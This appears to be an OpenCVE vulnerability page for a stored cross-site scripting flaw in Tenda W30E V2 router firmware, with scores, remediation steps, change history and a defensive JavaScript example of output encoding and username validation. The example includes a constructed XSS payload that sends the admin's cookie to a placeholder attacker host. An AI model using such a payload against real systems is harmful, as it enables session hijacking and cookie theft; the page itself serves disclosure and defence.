Description
Shenzhen Tenda W30E V2 firmware versions up to and including V16.01.0.19(5037) contain a stored cross-site scripting vulnerability in the user creation functionality. Insufficient input validation allows attacker-controlled script content to be stored and later executed when administrative users access the affected management pages.
Published: 2026-01-26
Score: 5.1 Medium
EPSS: < 1% Very Low
KEV: No
Impact: Stored Cross‑Site Scripting in Admin Interface
Action: Apply Patch
AI Analysis

Impact

A stored cross‑site scripting vulnerability exists in the user creation functionality of the Tenda W30E V2 firmware. Insufficient input validation lets an authenticated attacker with rights to create users inject script into the username field; the value is saved as-is and rendered without encoding when an administrator views the affected management page, at which point the script runs. This weakness is classified as CWE-79 and gives the attacker arbitrary JavaScript execution in the context of the admin's session, which can be used for session hijacking, for issuing configuration changes through the admin's browser, or for other client‑side compromise.

Affected Systems

The vulnerability affects Shenzhen Tenda Technology Co., Ltd. W30E V2 devices running firmware versions up to and including V16.01.0.19(5037). The NVD CPE entries below identify hardware revision 2.0 and place no upper bound on the firmware version, so every W30E V2 should be treated as affected until a release that fixes CVE-2026-24433 is confirmed.

Risk and Exploitability

The CVSS v4.0 base score of 5.1 (NVD also records a v3.1 score of 5.4) reflects that exploitation needs an authenticated account with rights to create users (PR:L), that the injected script only runs when an administrator views the affected page (UI:P), and that the direct confidentiality and integrity impact is rated low. The EPSS score of less than 1% indicates a low probability of exploitation in the wild, the vulnerability is not listed in the CISA Known Exploited Vulnerabilities catalog, and the SSVC assessment records no known exploitation and rates it not automatable. Attackers must supply a crafted username and rely on an admin to view the page. The payoff, however, is script execution inside a privileged admin session, so remediation should not be deferred.

Generated by OpenCVE AI on April 16, 2026 at 17:40 UTC.

Remediation

No vendor fix or workaround currently provided.

OpenCVE Recommended Actions

  • Upgrade the device to a vendor firmware release that addresses CVE-2026-24433 as soon as Tenda publishes one; at the time of writing no fixed version or workaround is listed, so check the vendor's support page for the W30E V2 rather than assuming a later build is fixed.
  • Until a fix ships, restrict user‑creation rights to as few accounts as possible, since exploitation requires an authenticated account that can create users, and review the existing user list for names containing markup characters. The underlying fix is the vendor's: encode the username for the HTML context wherever it is rendered, with an allow‑list on input (for example alphanumerics, dot, underscore and hyphen) as defence in depth rather than as the only control.
  • Limit who can reach the management interface by binding it to a secured management VLAN or firewall rule and disabling WAN‑side administration, and enforce two‑factor authentication where the device supports it, to reduce the likelihood that an attacker can reach the vulnerable functionality or abuse a hijacked admin session.
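The two controls described above, output encoding where the username is rendered and an allow‑list at creation time, as an added example in JavaScript. This is not code from the Tenda firmware or from OpenCVE; the function names, the table markup, the allow‑list pattern and the sample payload are all assumptions, and the real W30E rendering path is not reproduced. The example also includes a small triage helper an operator can run over an exported user list.

```javascript
"use strict";

// Added example (not Tenda code): why an unencoded username is an XSS sink,
// and the two controls that close it. All names and markup are assumptions.

// Allow-list for usernames: letters, digits, dot, underscore, hyphen, 1-32 chars.
// Rejecting everything else at creation time is defence in depth; the primary
// fix is output encoding, because other code paths may also write user records.
const USERNAME_RE = /^[A-Za-z0-9._-]{1,32}$/;

function isValidUsername(name) {
  return typeof name === "string" && USERNAME_RE.test(name);
}

// Encoding for the HTML text and double/single-quoted attribute contexts. Every
// character that can open or close markup or an attribute value becomes an entity.
function escapeHtml(value) {
  return String(value)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;");
}

// Vulnerable pattern: the stored username is concatenated straight into the
// admin "user list" page, so whatever the attacker saved is parsed as markup.
function renderUserRowUnsafe(user) {
  return `<tr><td>${user.name}</td><td>${user.role}</td></tr>`;
}

// Hardened pattern: encode at the point of rendering, for the context the value
// lands in. The stored value is untouched; only the emitted HTML changes.
function renderUserRowSafe(user) {
  return `<tr><td>${escapeHtml(user.name)}</td><td>${escapeHtml(user.role)}</td></tr>`;
}

// What a user-creation handler should do with the submitted name: enforce the
// allow-list before storing. Returns the stored record, or null on rejection.
function createUser(store, name, role) {
  if (!isValidUsername(name)) return null;
  const user = { name, role };
  store.push(user);
  return user;
}

// Triage helper for an operator who has exported the device's user list:
// any stored username that fails the allow-list is the only place a payload
// can live, so those are the records to inspect and delete.
function findSuspiciousUsernames(names) {
  return names.filter((n) => !isValidUsername(n));
}

// Constructed sample payload of the shape a stored-XSS attacker would submit.
// It is not a reproduction of any real payload against the W30E.
const PAYLOAD =
  '<img src=x onerror="document.location=\'http://attacker.example/?c=\'+document.cookie">';

function demo() {
  // Vulnerable firmware behaviour: no validation, the payload is stored as-is.
  const stored = [{ name: PAYLOAD, role: "guest" }];
  const unsafe = renderUserRowUnsafe(stored[0]);
  const safe = renderUserRowSafe(stored[0]);

  // Hardened creation path rejects the payload and accepts a normal name.
  const rejected = createUser([], PAYLOAD, "guest");
  const accepted = createUser([], "ops-admin_2", "admin");

  return {
    unsafeHasMarkup: unsafe.includes("<img"), // true: the browser runs onerror
    safeHasMarkup: safe.includes("<img"),     // false: rendered as literal text
    safeRow: safe,
    rejected,                                 // null
    accepted,                                 // { name: "ops-admin_2", role: "admin" }
    // Constructed export: two entries carry markup and get flagged.
    suspicious: findSuspiciousUsernames(["admin", PAYLOAD, "bob<svg/onload=1>", "user.1"]),
  };
}

console.log(JSON.stringify(demo(), null, 2));
```

The point of `renderUserRowSafe` is that encoding happens at the sink, for the specific HTML context, regardless of what validation ran at the source; `isValidUsername` then narrows the attack surface further and doubles as the check in `findSuspiciousUsernames` for records that were stored before the fix.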

Advisories

No advisories yet.

History

Wed, 28 Jan 2026 20:15:00 +0000

Type                 Values Removed   Values Added
First Time appeared  -                Tenda w30e Firmware
CPEs                 -                cpe:2.3:h:tenda:w30e:2.0:*:*:*:*:*:*:*
                                      cpe:2.3:o:tenda:w30e_firmware:*:*:*:*:*:*:*:*
Vendors & Products   -                Tenda w30e Firmware
Metrics              -                cvssV3_1 {'score': 5.4, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N'}


Tue, 27 Jan 2026 20:30:00 +0000

Type                 Values Removed   Values Added
First Time appeared  -                Tenda
                                      Tenda w30e
Vendors & Products   -                Tenda
                                      Tenda w30e

Mon, 26 Jan 2026 21:15:00 +0000

Type                 Values Removed   Values Added
Metrics              -                ssvc {'options': {'Automatable': 'no', 'Exploitation': 'none', 'Technical Impact': 'partial'}, 'version': '2.0.3'}


Mon, 26 Jan 2026 18:00:00 +0000

Type                 Values Removed   Values Added
Description          -                Shenzhen Tenda W30E V2 firmware versions up to and including V16.01.0.19(5037) contain a stored cross-site scripting vulnerability in the user creation functionality. Insufficient input validation allows attacker-controlled script content to be stored and later executed when administrative users access the affected management pages.
Title                -                Tenda W30E V2 Stored XSS via Username Field
Weaknesses           -                CWE-79
References           -                -
Metrics              -                cvssV4_0 {'score': 5.1, 'vector': 'CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N'}


MITRE

Status: PUBLISHED

Assigner: VulnCheck

Published:

Updated: 2026-03-05T01:30:34.765Z

Reserved: 2026-01-22T20:23:19.803Z

Link: CVE-2026-24433

Vulnrichment

Updated: 2026-01-26T21:08:19.927Z

NVD

Status : Analyzed

Published: 2026-01-26T18:16:40.873

Modified: 2026-01-28T20:10:23.400

Link: CVE-2026-24433

Redhat

No data.

OpenCVE Enrichment

Updated: 2026-04-16T17:45:27Z

Weaknesses